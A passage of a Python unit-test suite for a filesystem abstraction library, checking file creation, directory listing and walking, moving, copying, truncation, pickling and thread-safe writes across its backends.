except ResourceInvalidError:
pass
except Exception:
raise
ecls = sys.exc_info()[0]
assert False, "%s raised instead of ResourceInvalidError" % (ecls,)
else:
f.close()
assert False, "ResourceInvalidError was not raised"
def test_writefile(self):
self.assertRaises(ResourceNotFoundError, self.fs.open, "test1.txt")
f = self.fs.open("test1.txt", "wb")
f.write(b("testing"))
f.close()
self.assertTrue(self.check("test1.txt"))
f = self.fs.open("test1.txt", "rb")
self.assertEqual(f.read(), b("testing"))
f.close()
f = self.fs.open("test1.txt", "wb")
f.write(b("test file overwrite"))
f.close()
self.assertTrue(self.check("test1.txt"))
f = self.fs.open("test1.txt", "rb")
self.assertEqual(f.read(), b("test file overwrite"))
f.close()
def test_createfile(self):
test = b('now with content')
self.fs.createfile("test.txt")
self.assertTrue(self.fs.exists("test.txt"))
self.assertEqual(self.fs.getcontents("test.txt", "rb"), b(''))
self.fs.setcontents("test.txt", test)
self.fs.createfile("test.txt")
self.assertEqual(self.fs.getcontents("test.txt", "rb"), test)
self.fs.createfile("test.txt", wipe=True)
self.assertEqual(self.fs.getcontents("test.txt", "rb"), b(''))
def test_readline(self):
text = b"Hello\nWorld\n"
self.fs.setcontents('a.txt', text)
with self.fs.open('a.txt', 'rb') as f:
line = f.readline()
self.assertEqual(line, b"Hello\n")
def test_setcontents(self):
# setcontents() should accept both a string...
self.fs.setcontents("hello", b("world"))
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents("hello", StringIO(b("to you, good sir!")))
self.assertEqual(self.fs.getcontents(
"hello", "rb"), b("to you, good sir!"))
# setcontents() should accept both a string...
self.fs.setcontents("hello", b("world"), chunk_size=2)
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents("hello", StringIO(
b("to you, good sir!")), chunk_size=2)
self.assertEqual(self.fs.getcontents(
"hello", "rb"), b("to you, good sir!"))
self.fs.setcontents("hello", b(""))
self.assertEqual(self.fs.getcontents("hello", "rb"), b(""))
def test_setcontents_async(self):
# setcontents() should accept both a string...
self.fs.setcontents_async("hello", b("world")).wait()
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents_async("hello", StringIO(
b("to you, good sir!"))).wait()
self.assertEqual(self.fs.getcontents("hello"), b("to you, good sir!"))
self.fs.setcontents_async("hello", b("world"), chunk_size=2).wait()
self.assertEqual(self.fs.getcontents("hello", "rb"), b("world"))
# ...and a file-like object
self.fs.setcontents_async("hello", StringIO(
b("to you, good sir!")), chunk_size=2).wait()
self.assertEqual(self.fs.getcontents(
"hello", "rb"), b("to you, good sir!"))
def test_isdir_isfile(self):
self.assertFalse(self.fs.exists("dir1"))
self.assertFalse(self.fs.isdir("dir1"))
self.assertFalse(self.fs.isfile("a.txt"))
self.fs.setcontents("a.txt", b(''))
self.assertFalse(self.fs.isdir("dir1"))
self.assertTrue(self.fs.exists("a.txt"))
self.assertTrue(self.fs.isfile("a.txt"))
self.assertFalse(self.fs.exists("a.txt/thatsnotadir"))
self.fs.makedir("dir1")
self.assertTrue(self.fs.isdir("dir1"))
self.assertTrue(self.fs.exists("dir1"))
self.assertTrue(self.fs.exists("a.txt"))
self.fs.remove("a.txt")
self.assertFalse(self.fs.exists("a.txt"))
def test_listdir(self):
def check_unicode(items):
for item in items:
self.assertTrue(isinstance(item, str))
self.fs.setcontents("a", b(''))
self.fs.setcontents("b", b(''))
self.fs.setcontents("foo", b(''))
self.fs.setcontents("bar", b(''))
# Test listing of the root directory
d1 = self.fs.listdir()
self.assertEqual(len(d1), 4)
self.assertEqual(sorted(d1), ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdir("")
self.assertEqual(len(d1), 4)
self.assertEqual(sorted(d1), ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdir("/")
self.assertEqual(len(d1), 4)
check_unicode(d1)
# Test listing absolute paths
d2 = self.fs.listdir(absolute=True)
self.assertEqual(len(d2), 4)
self.assertEqual(sorted(d2), ["/a", "/b", "/bar", "/foo"])
check_unicode(d2)
# Create some deeper subdirectories, to make sure their
# contents are not inadvertantly included
self.fs.makedir("p/1/2/3", recursive=True)
self.fs.setcontents("p/1/2/3/a", b(''))
self.fs.setcontents("p/1/2/3/b", b(''))
self.fs.setcontents("p/1/2/3/foo", b(''))
self.fs.setcontents("p/1/2/3/bar", b(''))
self.fs.makedir("q")
# Test listing just files, just dirs, and wildcards
dirs_only = self.fs.listdir(dirs_only=True)
files_only = self.fs.listdir(files_only=True)
contains_a = self.fs.listdir(wildcard="*a*")
self.assertEqual(sorted(dirs_only), ["p", "q"])
self.assertEqual(sorted(files_only), ["a", "b", "bar", "foo"])
self.assertEqual(sorted(contains_a), ["a", "bar"])
check_unicode(dirs_only)
check_unicode(files_only)
check_unicode(contains_a)
# Test listing a subdirectory
d3 = self.fs.listdir("p/1/2/3")
self.assertEqual(len(d3), 4)
self.assertEqual(sorted(d3), ["a", "b", "bar", "foo"])
check_unicode(d3)
# Test listing a subdirectory with absoliute and full paths
d4 = self.fs.listdir("p/1/2/3", absolute=True)
self.assertEqual(len(d4), 4)
self.assertEqual(sorted(d4), ["/p/1/2/3/a", "/p/1/2/3/b", "/p/1/2/3/bar", "/p/1/2/3/foo"])
check_unicode(d4)
d4 = self.fs.listdir("p/1/2/3", full=True)
self.assertEqual(len(d4), 4)
self.assertEqual(sorted(d4), ["p/1/2/3/a", "p/1/2/3/b", "p/1/2/3/bar", "p/1/2/3/foo"])
check_unicode(d4)
# Test that appropriate errors are raised
self.assertRaises(ResourceNotFoundError, self.fs.listdir, "zebra")
self.assertRaises(ResourceInvalidError, self.fs.listdir, "foo")
def test_listdirinfo(self):
def check_unicode(items):
for (nm, info) in items:
self.assertTrue(isinstance(nm, str))
def check_equal(items, target):
names = [nm for (nm, info) in items]
self.assertEqual(sorted(names), sorted(target))
self.fs.setcontents("a", b(''))
self.fs.setcontents("b", b(''))
self.fs.setcontents("foo", b(''))
self.fs.setcontents("bar", b(''))
# Test listing of the root directory
d1 = self.fs.listdirinfo()
self.assertEqual(len(d1), 4)
check_equal(d1, ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdirinfo("")
self.assertEqual(len(d1), 4)
check_equal(d1, ["a", "b", "bar", "foo"])
check_unicode(d1)
d1 = self.fs.listdirinfo("/")
self.assertEqual(len(d1), 4)
check_equal(d1, ["a", "b", "bar", "foo"])
check_unicode(d1)
# Test listing absolute paths
d2 = self.fs.listdirinfo(absolute=True)
self.assertEqual(len(d2), 4)
check_equal(d2, ["/a", "/b", "/bar", "/foo"])
check_unicode(d2)
# Create some deeper subdirectories, to make sure their
# contents are not inadvertantly included
self.fs.makedir("p/1/2/3", recursive=True)
self.fs.setcontents("p/1/2/3/a", b(''))
self.fs.setcontents("p/1/2/3/b", b(''))
self.fs.setcontents("p/1/2/3/foo", b(''))
self.fs.setcontents("p/1/2/3/bar", b(''))
self.fs.makedir("q")
# Test listing just files, just dirs, and wildcards
dirs_only = self.fs.listdirinfo(dirs_only=True)
files_only = self.fs.listdirinfo(files_only=True)
contains_a = self.fs.listdirinfo(wildcard="*a*")
check_equal(dirs_only, ["p", "q"])
check_equal(files_only, ["a", "b", "bar", "foo"])
check_equal(contains_a, ["a", "bar"])
check_unicode(dirs_only)
check_unicode(files_only)
check_unicode(contains_a)
# Test listing a subdirectory
d3 = self.fs.listdirinfo("p/1/2/3")
self.assertEqual(len(d3), 4)
check_equal(d3, ["a", "b", "bar", "foo"])
check_unicode(d3)
# Test listing a subdirectory with absoliute and full paths
d4 = self.fs.listdirinfo("p/1/2/3", absolute=True)
self.assertEqual(len(d4), 4)
check_equal(d4, ["/p/1/2/3/a", "/p/1/2/3/b", "/p/1/2/3/bar", "/p/1/2/3/foo"])
check_unicode(d4)
d4 = self.fs.listdirinfo("p/1/2/3", full=True)
self.assertEqual(len(d4), 4)
check_equal(d4, ["p/1/2/3/a", "p/1/2/3/b", "p/1/2/3/bar", "p/1/2/3/foo"])
check_unicode(d4)
# Test that appropriate errors are raised
self.assertRaises(ResourceNotFoundError, self.fs.listdirinfo, "zebra")
self.assertRaises(ResourceInvalidError, self.fs.listdirinfo, "foo")
def test_walk(self):
self.fs.setcontents('a.txt', b('hello'))
self.fs.setcontents('b.txt', b('world'))
self.fs.makeopendir('foo').setcontents('c', b('123'))
sorted_walk = sorted([(d, sorted(fs)) for (d, fs) in self.fs.walk()])
self.assertEqual(sorted_walk,
[("/", ["a.txt", "b.txt"]),
("/foo", ["c"])])
# When searching breadth-first, shallow entries come first
found_a = False
for _, files in self.fs.walk(search="breadth"):
if "a.txt" in files:
found_a = True
if "c" in files:
break
assert found_a, "breadth search order was wrong"
# When searching depth-first, deep entries come first
found_c = False
for _, files in self.fs.walk(search="depth"):
if "c" in files:
found_c = True
if "a.txt" in files:
break
assert found_c, "depth search order was wrong: " + \
str(list(self.fs.walk(search="depth")))
def test_walk_wildcard(self):
self.fs.setcontents('a.txt', b('hello'))
self.fs.setcontents('b.txt', b('world'))
self.fs.makeopendir('foo').setcontents('c', b('123'))
self.fs.makeopendir('.svn').setcontents('ignored', b(''))
for dir_path, paths in self.fs.walk(wildcard='*.txt'):
for path in paths:
self.assertTrue(path.endswith('.txt'))
for dir_path, paths in self.fs.walk(wildcard=lambda fn: fn.endswith('.txt')):
for path in paths:
self.assertTrue(path.endswith('.txt'))
def test_walk_dir_wildcard(self):
self.fs.setcontents('a.txt', b('hello'))
self.fs.setcontents('b.txt', b('world'))
self.fs.makeopendir('foo').setcontents('c', b('123'))
self.fs.makeopendir('.svn').setcontents('ignored', b(''))
for dir_path, paths in self.fs.walk(dir_wildcard=lambda fn: not fn.endswith('.svn')):
for path in paths:
self.assertTrue('.svn' not in path)
def test_walkfiles(self):
self.fs.makeopendir('bar').setcontents('a.txt', b('123'))
self.fs.makeopendir('foo').setcontents('b', b('123'))
self.assertEqual(sorted(
self.fs.walkfiles()), ["/bar/a.txt", "/foo/b"])
self.assertEqual(sorted(self.fs.walkfiles(
dir_wildcard="*foo*")), ["/foo/b"])
self.assertEqual(sorted(self.fs.walkfiles(
wildcard="*.txt")), ["/bar/a.txt"])
def test_walkdirs(self):
self.fs.makeopendir('bar').setcontents('a.txt', b('123'))
self.fs.makeopendir('foo').makeopendir(
"baz").setcontents('b', b('123'))
self.assertEqual(sorted(self.fs.walkdirs()), [
"/", "/bar", "/foo", "/foo/baz"])
self.assertEqual(sorted(self.fs.walkdirs(
wildcard="*foo*")), ["/", "/foo", "/foo/baz"])
def test_unicode(self):
alpha = "\N{GREEK SMALL LETTER ALPHA}"
beta = "\N{GREEK SMALL LETTER BETA}"
self.fs.makedir(alpha)
self.fs.setcontents(alpha + "/a", b(''))
self.fs.setcontents(alpha + "/" + beta, b(''))
self.assertTrue(self.check(alpha))
self.assertEqual(sorted(self.fs.listdir(alpha)), ["a", beta])
def test_makedir(self):
check = self.check
self.fs.makedir("a")
self.assertTrue(check("a"))
self.assertRaises(
ParentDirectoryMissingError, self.fs.makedir, "a/b/c")
self.fs.makedir("a/b/c", recursive=True)
self.assertTrue(check("a/b/c"))
self.fs.makedir("foo/bar/baz", recursive=True)
self.assertTrue(check("foo/bar/baz"))
self.fs.makedir("a/b/child")
self.assertTrue(check("a/b/child"))
self.assertRaises(DestinationExistsError, self.fs.makedir, "/a/b")
self.fs.makedir("/a/b", allow_recreate=True)
self.fs.setcontents("/a/file", b(''))
self.assertRaises(ResourceInvalidError, self.fs.makedir, "a/file")
def test_remove(self):
self.fs.setcontents("a.txt", b(''))
self.assertTrue(self.check("a.txt"))
self.fs.remove("a.txt")
self.assertFalse(self.check("a.txt"))
self.assertRaises(ResourceNotFoundError, self.fs.remove, "a.txt")
self.fs.makedir("dir1")
self.assertRaises(ResourceInvalidError, self.fs.remove, "dir1")
self.fs.setcontents("/dir1/a.txt", b(''))
self.assertTrue(self.check("dir1/a.txt"))
self.fs.remove("dir1/a.txt")
self.assertFalse(self.check("/dir1/a.txt"))
def test_removedir(self):
check = self.check
self.fs.makedir("a")
self.assertTrue(check("a"))
self.fs.removedir("a")
self.assertRaises(ResourceNotFoundError, self.fs.removedir, "a")
self.assertTrue(not check("a"))
self.fs.makedir("a/b/c/d", recursive=True)
self.assertRaises(DirectoryNotEmptyError, self.fs.removedir, "a/b")
self.fs.removedir("a/b/c/d")
self.assertTrue(not check("a/b/c/d"))
self.fs.removedir("a/b/c")
self.assertTrue(not check("a/b/c"))
self.fs.removedir("a/b")
self.assertTrue(not check("a/b"))
# Test recursive removal of empty parent dirs
self.fs.makedir("foo/bar/baz", recursive=True)
self.fs.removedir("foo/bar/baz", recursive=True)
self.assertTrue(not check("foo/bar/baz"))
self.assertTrue(not check("foo/bar"))
self.assertTrue(not check("foo"))
self.fs.makedir("foo/bar/baz", recursive=True)
self.fs.setcontents("foo/file.txt", b("please don't delete me"))
self.fs.removedir("foo/bar/baz", recursive=True)
self.assertTrue(not check("foo/bar/baz"))
self.assertTrue(not check("foo/bar"))
self.assertTrue(check("foo/file.txt"))
# Ensure that force=True works as expected
self.fs.makedir("frollic/waggle", recursive=True)
self.fs.setcontents("frollic/waddle.txt", b("waddlewaddlewaddle"))
self.assertRaises(DirectoryNotEmptyError, self.fs.removedir, "frollic")
self.assertRaises(
ResourceInvalidError, self.fs.removedir, "frollic/waddle.txt")
self.fs.removedir("frollic", force=True)
self.assertTrue(not check("frollic"))
# Test removing unicode dirs
kappa = "\N{GREEK CAPITAL LETTER KAPPA}"
self.fs.makedir(kappa)
self.assertTrue(self.fs.isdir(kappa))
self.fs.removedir(kappa)
self.assertRaises(ResourceNotFoundError, self.fs.removedir, kappa)
self.assertTrue(not self.fs.isdir(kappa))
self.fs.makedir(pathjoin("test", kappa), recursive=True)
self.assertTrue(check(pathjoin("test", kappa)))
self.fs.removedir("test", force=True)
self.assertTrue(not check("test"))
def test_rename(self):
check = self.check
# test renaming a file in the same directory
self.fs.setcontents("foo.txt", b("Hello, World!"))
self.assertTrue(check("foo.txt"))
self.fs.rename("foo.txt", "bar.txt")
self.assertTrue(check("bar.txt"))
self.assertTrue(not check("foo.txt"))
# test renaming a directory in the same directory
self.fs.makedir("dir_a")
self.fs.setcontents("dir_a/test.txt", b("testerific"))
self.assertTrue(check("dir_a"))
self.fs.rename("dir_a", "dir_b")
self.assertTrue(check("dir_b"))
self.assertTrue(check("dir_b/test.txt"))
self.assertTrue(not check("dir_a/test.txt"))
self.assertTrue(not check("dir_a"))
# test renaming a file into a different directory
self.fs.makedir("dir_a")
self.fs.rename("dir_b/test.txt", "dir_a/test.txt")
self.assertTrue(not check("dir_b/test.txt"))
self.assertTrue(check("dir_a/test.txt"))
# test renaming a file into a non-existent directory
self.assertRaises(ParentDirectoryMissingError,
self.fs.rename, "dir_a/test.txt", "nonexistent/test.txt")
def test_info(self):
test_str = b("Hello, World!")
self.fs.setcontents("info.txt", test_str)
info = self.fs.getinfo("info.txt")
self.assertEqual(info['size'], len(test_str))
self.fs.desc("info.txt")
self.assertRaises(ResourceNotFoundError, self.fs.getinfo, "notafile")
self.assertRaises(
ResourceNotFoundError, self.fs.getinfo, "info.txt/inval")
def test_infokeys(self):
test_str = b("Hello, World!")
self.fs.setcontents("info.txt", test_str)
info = self.fs.getinfo("info.txt")
for k, v in info.items():
if not (k == 'asbytes' and callable(v)):
self.assertEqual(self.fs.getinfokeys('info.txt', k), {k: v})
test_info = {}
if 'modified_time' in info:
test_info['modified_time'] = info['modified_time']
if 'size' in info:
test_info['size'] = info['size']
self.assertEqual(self.fs.getinfokeys('info.txt', 'size', 'modified_time'), test_info)
self.assertEqual(self.fs.getinfokeys('info.txt', 'thiscantpossiblyexistininfo'), {})
def test_getsize(self):
test_str = b("*") * 23
self.fs.setcontents("info.txt", test_str)
size = self.fs.getsize("info.txt")
self.assertEqual(size, len(test_str))
def test_movefile(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
def checkcontents(path):
check_contents = self.fs.getcontents(path, "rb")
self.assertEqual(check_contents, contents)
return contents == check_contents
self.fs.makedir("foo/bar", recursive=True)
makefile("foo/bar/a.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(checkcontents("foo/bar/a.txt"))
self.fs.move("foo/bar/a.txt", "foo/b.txt")
self.assertTrue(not check("foo/bar/a.txt"))
self.assertTrue(check("foo/b.txt"))
self.assertTrue(checkcontents("foo/b.txt"))
self.fs.move("foo/b.txt", "c.txt")
self.assertTrue(not check("foo/b.txt"))
self.assertTrue(check("/c.txt"))
self.assertTrue(checkcontents("/c.txt"))
makefile("foo/bar/a.txt")
self.assertRaises(
DestinationExistsError, self.fs.move, "foo/bar/a.txt", "/c.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(check("/c.txt"))
self.fs.move("foo/bar/a.txt", "/c.txt", overwrite=True)
self.assertTrue(not check("foo/bar/a.txt"))
self.assertTrue(check("/c.txt"))
def test_movedir(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
self.assertRaises(ResourceNotFoundError, self.fs.movedir, "a", "b")
self.fs.makedir("a")
self.fs.makedir("b")
makefile("a/1.txt")
makefile("a/2.txt")
makefile("a/3.txt")
self.fs.makedir("a/foo/bar", recursive=True)
makefile("a/foo/bar/baz.txt")
self.fs.movedir("a", "copy of a")
self.assertTrue(self.fs.isdir("copy of a"))
self.assertTrue(check("copy of a/1.txt"))
self.assertTrue(check("copy of a/2.txt"))
self.assertTrue(check("copy of a/3.txt"))
self.assertTrue(check("copy of a/foo/bar/baz.txt"))
self.assertTrue(not check("a/1.txt"))
self.assertTrue(not check("a/2.txt"))
self.assertTrue(not check("a/3.txt"))
self.assertTrue(not check("a/foo/bar/baz.txt"))
self.assertTrue(not check("a/foo/bar"))
self.assertTrue(not check("a/foo"))
self.assertTrue(not check("a"))
self.fs.makedir("a")
self.assertRaises(
DestinationExistsError, self.fs.movedir, "copy of a", "a")
self.fs.movedir("copy of a", "a", overwrite=True)
self.assertTrue(not check("copy of a"))
self.assertTrue(check("a/1.txt"))
self.assertTrue(check("a/2.txt"))
self.assertTrue(check("a/3.txt"))
self.assertTrue(check("a/foo/bar/baz.txt"))
def test_cant_copy_from_os(self):
sys_executable = os.path.abspath(os.path.realpath(sys.executable))
self.assertRaises(FSError, self.fs.copy, sys_executable, "py.exe")
def test_copyfile(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path, contents=contents):
self.fs.setcontents(path, contents)
def checkcontents(path, contents=contents):
check_contents = self.fs.getcontents(path, "rb")
self.assertEqual(check_contents, contents)
return contents == check_contents
self.fs.makedir("foo/bar", recursive=True)
makefile("foo/bar/a.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(checkcontents("foo/bar/a.txt"))
# import rpdb2; rpdb2.start_embedded_debugger('password');
self.fs.copy("foo/bar/a.txt", "foo/b.txt")
self.assertTrue(check("foo/bar/a.txt"))
self.assertTrue(check("foo/b.txt"))
self.assertTrue(checkcontents("foo/bar/a.txt"))
self.assertTrue(checkcontents("foo/b.txt"))
self.fs.copy("foo/b.txt", "c.txt")
self.assertTrue(check("foo/b.txt"))
self.assertTrue(check("/c.txt"))
self.assertTrue(checkcontents("/c.txt"))
makefile("foo/bar/a.txt", b("different contents"))
self.assertTrue(checkcontents("foo/bar/a.txt", b("different contents")))
self.assertRaises(
DestinationExistsError, self.fs.copy, "foo/bar/a.txt", "/c.txt")
self.assertTrue(checkcontents("/c.txt"))
self.fs.copy("foo/bar/a.txt", "/c.txt", overwrite=True)
self.assertTrue(checkcontents("foo/bar/a.txt", b("different contents")))
self.assertTrue(checkcontents("/c.txt", b("different contents")))
def test_copydir(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
def checkcontents(path):
check_contents = self.fs.getcontents(path)
self.assertEqual(check_contents, contents)
return contents == check_contents
self.fs.makedir("a")
self.fs.makedir("b")
makefile("a/1.txt")
makefile("a/2.txt")
makefile("a/3.txt")
self.fs.makedir("a/foo/bar", recursive=True)
makefile("a/foo/bar/baz.txt")
self.fs.copydir("a", "copy of a")
self.assertTrue(check("copy of a/1.txt"))
self.assertTrue(check("copy of a/2.txt"))
self.assertTrue(check("copy of a/3.txt"))
self.assertTrue(check("copy of a/foo/bar/baz.txt"))
checkcontents("copy of a/1.txt")
self.assertTrue(check("a/1.txt"))
self.assertTrue(check("a/2.txt"))
self.assertTrue(check("a/3.txt"))
self.assertTrue(check("a/foo/bar/baz.txt"))
checkcontents("a/1.txt")
self.assertRaises(DestinationExistsError, self.fs.copydir, "a", "b")
self.fs.copydir("a", "b", overwrite=True)
self.assertTrue(check("b/1.txt"))
self.assertTrue(check("b/2.txt"))
self.assertTrue(check("b/3.txt"))
self.assertTrue(check("b/foo/bar/baz.txt"))
checkcontents("b/1.txt")
def test_copydir_with_dotfile(self):
check = self.check
contents = b(
"If the implementation is hard to explain, it's a bad idea.")
def makefile(path):
self.fs.setcontents(path, contents)
self.fs.makedir("a")
makefile("a/1.txt")
makefile("a/2.txt")
makefile("a/.hidden.txt")
self.fs.copydir("a", "copy of a")
self.assertTrue(check("copy of a/1.txt"))
self.assertTrue(check("copy of a/2.txt"))
self.assertTrue(check("copy of a/.hidden.txt"))
self.assertTrue(check("a/1.txt"))
self.assertTrue(check("a/2.txt"))
self.assertTrue(check("a/.hidden.txt"))
def test_readwriteappendseek(self):
def checkcontents(path, check_contents):
read_contents = self.fs.getcontents(path, "rb")
self.assertEqual(read_contents, check_contents)
return read_contents == check_contents
test_strings = [b("Beautiful is better than ugly."),
b("Explicit is better than implicit."),
b("Simple is better than complex.")]
all_strings = b("").join(test_strings)
self.assertRaises(ResourceNotFoundError, self.fs.open, "a.txt", "r")
self.assertTrue(not self.fs.exists("a.txt"))
f1 = self.fs.open("a.txt", "wb")
pos = 0
for s in test_strings:
f1.write(s)
pos += len(s)
self.assertEqual(pos, f1.tell())
f1.close()
self.assertTrue(self.fs.exists("a.txt"))
self.assertTrue(checkcontents("a.txt", all_strings))
f2 = self.fs.open("b.txt", "wb")
f2.write(test_strings[0])
f2.close()
self.assertTrue(checkcontents("b.txt", test_strings[0]))
f3 = self.fs.open("b.txt", "ab")
# On win32, tell() gives zero until you actually write to the file
# self.assertEquals(f3.tell(),len(test_strings[0]))
f3.write(test_strings[1])
self.assertEqual(f3.tell(), len(test_strings[0])+len(test_strings[1]))
f3.write(test_strings[2])
self.assertEqual(f3.tell(), len(all_strings))
f3.close()
self.assertTrue(checkcontents("b.txt", all_strings))
f4 = self.fs.open("b.txt", "wb")
f4.write(test_strings[2])
f4.close()
self.assertTrue(checkcontents("b.txt", test_strings[2]))
f5 = self.fs.open("c.txt", "wb")
for s in test_strings:
f5.write(s+b("\n"))
f5.close()
f6 = self.fs.open("c.txt", "rb")
for s, t in zip(f6, test_strings):
self.assertEqual(s, t+b("\n"))
f6.close()
f7 = self.fs.open("c.txt", "rb")
f7.seek(13)
word = f7.read(6)
self.assertEqual(word, b("better"))
f7.seek(1, os.SEEK_CUR)
word = f7.read(4)
self.assertEqual(word, b("than"))
f7.seek(-9, os.SEEK_END)
word = f7.read(7)
self.assertEqual(word, b("complex"))
f7.close()
self.assertEqual(self.fs.getcontents("a.txt", "rb"), all_strings)
def test_truncate(self):
def checkcontents(path, check_contents):
read_contents = self.fs.getcontents(path, "rb")
self.assertEqual(read_contents, check_contents)
return read_contents == check_contents
self.fs.setcontents("hello", b("world"))
checkcontents("hello", b("world"))
self.fs.setcontents("hello", b("hi"))
checkcontents("hello", b("hi"))
self.fs.setcontents("hello", b("1234567890"))
checkcontents("hello", b("1234567890"))
with self.fs.open("hello", "rb+") as f:
f.truncate(7)
checkcontents("hello", b("1234567"))
with self.fs.open("hello", "rb+") as f:
f.seek(5)
f.truncate()
checkcontents("hello", b("12345"))
def test_truncate_to_larger_size(self):
with self.fs.open("hello", "wb") as f:
f.truncate(30)
self.assertEqual(self.fs.getsize("hello"), 30)
# Some file systems (FTPFS) don't support both reading and writing
if self.fs.getmeta('file.read_and_write', True):
with self.fs.open("hello", "rb+") as f:
f.seek(25)
f.write(b("123456"))
with self.fs.open("hello", "rb") as f:
f.seek(25)
self.assertEqual(f.read(), b("123456"))
def test_write_past_end_of_file(self):
if self.fs.getmeta('file.read_and_write', True):
with self.fs.open("write_at_end", "wb") as f:
f.seek(25)
f.write(b("EOF"))
with self.fs.open("write_at_end", "rb") as f:
self.assertEqual(f.read(), b("\x00")*25 + b("EOF"))
def test_with_statement(self):
contents = b"testing the with statement"
# A successful 'with' statement
with self.fs.open('f.txt','wb-') as testfile:
testfile.write(contents)
self.assertEqual(self.fs.getcontents('f.txt', 'rb'), contents)
# A 'with' statement raising an error
def with_error():
with self.fs.open('g.txt','wb-') as testfile:
testfile.write(contents)
raise ValueError
self.assertRaises(ValueError, with_error)
self.assertEqual(self.fs.getcontents('g.txt', 'rb'), contents)
def test_pickling(self):
if self.fs.getmeta('pickle_contents', True):
self.fs.setcontents("test1", b("hello world"))
fs2 = pickle.loads(pickle.dumps(self.fs))
self.assertTrue(fs2.isfile("test1"))
fs3 = pickle.loads(pickle.dumps(self.fs, -1))
self.assertTrue(fs3.isfile("test1"))
else:
# Just make sure it doesn't throw an exception
fs2 = pickle.loads(pickle.dumps(self.fs))
def test_big_file(self):
"""Test handling of a big file (1MB)"""
chunk_size = 1024 * 256
num_chunks = 4
def chunk_stream():
"""Generate predictable-but-randomy binary content."""
r = random.Random(0)
randint = r.randint
int2byte = six.int2byte
for _i in range(num_chunks):
c = b("").join(int2byte(randint(
0, 255)) for _j in range(chunk_size//8))
yield c * 8
f = self.fs.open("bigfile", "wb")
try:
for chunk in chunk_stream():
f.write(chunk)
finally:
f.close()
chunks = chunk_stream()
f = self.fs.open("bigfile", "rb")
try:
try:
while True:
if next(chunks) != f.read(chunk_size):
assert False, "bigfile was corrupted"
except StopIteration:
if f.read() != b(""):
assert False, "bigfile was corrupted"
finally:
f.close()
def test_settimes(self):
def cmp_datetimes(d1, d2):
"""Test datetime objects are the same to within the timestamp accuracy"""
dts1 = time.mktime(d1.timetuple())
dts2 = time.mktime(d2.timetuple())
return int(dts1) == int(dts2)
d1 = datetime.datetime(2010, 6, 20, 11, 0, 9, 987699)
d2 = datetime.datetime(2010, 7, 5, 11, 0, 9, 500000)
self.fs.setcontents('/dates.txt', b('check dates'))
# If the implementation supports settimes, check that the times
# can be set and then retrieved
try:
self.fs.settimes('/dates.txt', d1, d2)
except UnsupportedError:
pass
else:
info = self.fs.getinfo('/dates.txt')
self.assertTrue(cmp_datetimes(d1, info['accessed_time']))
self.assertTrue(cmp_datetimes(d2, info['modified_time']))
def test_removeroot(self):
self.assertRaises(RemoveRootError, self.fs.removedir, "/")
def test_zero_read(self):
"""Test read(0) returns empty string"""
self.fs.setcontents('foo.txt', b('Hello, World'))
with self.fs.open('foo.txt', 'rb') as f:
self.assertTrue(len(f.read(0)) == 0)
with self.fs.open('foo.txt', 'rt') as f:
self.assertTrue(len(f.read(0)) == 0)
# May be disabled - see end of file
class ThreadingTestCases(object):
"""Testcases for thread-safety of FS implementations."""
# These are either too slow to be worth repeating,
# or cannot possibly break cross-thread.
_dont_retest = ("test_pickling", "test_multiple_overwrite",)
__lock = threading.RLock()
def _yield(self):
# time.sleep(0.001)
# Yields without a delay
time.sleep(0)
def _lock(self):
self.__lock.acquire()
def _unlock(self):
self.__lock.release()
def _makeThread(self, func, errors):
def runThread():
try:
func()
except Exception:
errors.append(sys.exc_info())
thread = threading.Thread(target=runThread)
thread.daemon = True
return thread
def _runThreads(self, *funcs):
check_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
errors = []
threads = [self._makeThread(f, errors) for f in funcs]
for t in threads:
t.start()
for t in threads:
t.join()
for (c, e, t) in errors:
raise e.with_traceback(t)
finally:
sys.setcheckinterval(check_interval)
def test_setcontents_threaded(self):
def setcontents(name, contents):
f = self.fs.open(name, "wb")
self._yield()
try:
f.write(contents)
self._yield()
finally:
f.close()
def thread1():
c = b("thread1 was 'ere")
setcontents("thread1.txt", c)
self.assertEqual(self.fs.getcontents("thread1.txt", 'rb'), c)
def thread2():
c = b("thread2 was 'ere")
setcontents("thread2.txt", c)
self.assertEqual(self.fs.getcontents("thread2.txt", 'rb'), c)
self._runThreads(thread1, thread2)
def test_setcontents_threaded_samefile(self):
def setcontents(name, contents):
f = self.fs.open(name, "wb")
self._yield()
try:
f.write(contents)
self._yield()
finally:
f.close()
def thread1():
c = b("thread1 was 'ere")
setcontents("threads.txt", c)
self._yield()
self.assertEqual(self.fs.listdir("/"), ["threads.txt"])
def thread2():
c = b("thread2 was 'ere")
setcontents("threads.txt", c)
self._yield()
self.assertEqual(self.fs.listdir("/"), ["threads.txt"])
def thread3():
c = b("thread3 was 'ere")
setcontents("threads.txt", c)
self._yield()
self.assertEqual(self.fs.listdir("/"), ["threads.txt"])
try:
self._runThreads(thread1, thread2, thread3)
except ResourceLockedError:
# that's ok, some implementations don't support concurrent writes
pass
def test_cases_in_separate_dirs(self):
class TestCases_in_subdir(self.__class__, unittest.TestCase):
"""Run all testcases against a subdir of self.fs"""
def __init__(this, subdir):
super(TestCases_in_subdir, this).__init__("test_listdir")
this.subdir = subdir
for meth in dir(this):
if not meth.startswith("test_"):
continue
if meth in self._dont_retest:
continue
if not hasattr(FSTestCases, meth):
continue
if self.fs.exists(subdir):
self.fs.removedir(subdir, force=True)
self.assertFalse(self.fs.isdir(subdir))
